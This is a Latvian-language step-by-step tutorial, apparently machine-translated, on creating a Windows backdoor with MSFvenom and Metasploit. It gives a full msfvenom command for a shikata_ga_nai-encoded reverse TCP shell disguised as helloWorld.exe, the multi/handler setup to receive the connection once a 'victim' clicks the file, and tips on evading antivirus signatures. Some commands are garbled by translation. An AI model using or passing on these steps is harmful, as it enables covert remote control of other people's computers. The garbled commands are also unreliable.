Aizmugurējās durvis tiek izmantotas, lai apietu drošības mehānismus, bieži slepeni un lielākoties nenosakāmi. Izmantojot MSFvenom, msfpayload un msfencode kombināciju, ir iespējams izveidot aizmugurējās durvis, kas atkal savienojas ar uzbrucēju, izmantojot reverso apvalku TCP. Lai izveidotu aizmugurējās durvis, jums jāmaina ļaunprātīgas programmatūras paraksts, lai izvairītos no pretvīrusu programmatūras. Pabeigt šo projektu datoros, kuriem jums ir atļauja piekļūt, un jūs uzzināsit vairāk par datoru drošību un to, kā darbojas šāda veida aizmugurējās durvis.
Soļi
1. solis. Palaidiet Kali un aktivizējiet termināļa konsoli
2. solis. Ierakstiet ifconfig, lai parādītu saskarni un pārbaudītu savu IP adresi
3. solis. Lai parādītu kodētāju sarakstu, ierakstiet msfvenom -l kodētājus
Kā kodētāju izmantosit x86/shikata_ga_nai
4. solis. Ierakstiet "msfvenom -a x86 -platforma windows -p windows/shell/reverse_tcp LHOST = 192.168.48.129 LPORT = 4444 -b" / x00 "-e x86/shikata_ga_nai -f exe> helloWorld.exe
- -a x86 -platformas logi norāda izmantojamo arhitektūru.
- -p windows/shell/reverse_tcp apzīmē iegulto kravu.
- LHOST apzīmē klausītāja IP adresi.
- LPORT apzīmē klausītāja portu.
- -b "\ x00" apzīmē, lai izvairītos no sliktas rakstzīmes (nulles baiti).
- -e x86/shikata_ga_nai apzīmē kodētāja nosaukumu.
- -f exe> helloWorld.exe apzīmē formāta izvadi.
5. solis. Lai aktivizētu Metasploit, ierakstiet msfconsole
Tagad jūs esat izveidojis savas aizmugurējās durvis. Kad upuris noklikšķina uz helloWorld.exe, tiks aktivizēta iebūvētā apvalka lietderīgā slodze un tiks izveidots savienojums ar jūsu sistēmu. Lai saņemtu savienojumu, jums Metasploit ir jāatver daudzfunkcionālais apstrādātājs un jāiestata derīgās slodzes
6. solis. Ierakstiet use exploit/multi/handler
7. solis. Ierakstiet set payload windows/shell/reverse_tcp
8. solis. Lai pārbaudītu moduli, ierakstiet parādīšanas opcijas
9. solis. Ierakstiet komplektu LHOST 192.168.48.129
"LHOST" apzīmē klausītāja IP adresi
10. solis. Ierakstiet komplektu LPORT 4444
"LPORT" apzīmē klausītāja portu
11. solis. Ierakstiet palaist un gaidiet savienojumu no upura mašīnas
12. solis. Pagaidiet, līdz upuris noklikšķinās uz helloWorld.exe
Tad jūs būsit veiksmīgi savienots ar upura mašīnu.
Padomi
- Izmantojot -i MSFvenom, tiks attēlotas iterācijas kodējumā. Dažreiz vairāk atkārtojumu var palīdzēt izvairīties no AV programmatūras.
- Jūs esat iemācījušies ģenerēt aizmugurējās durvis un kodēt, izmantojot MSFvenom, taču šī metode mūsdienās nedarbosies perfekti pret dažām AV programmatūrām. Iemesls tam ir izpildes veidnes MSFvenom. AV pārdevēji ir pievienojuši šo veidņu statisko parakstu un vienkārši meklē tos. Šīs problēmas risinājums ir izmantot citu izpildes veidni vai dažādus rīkus.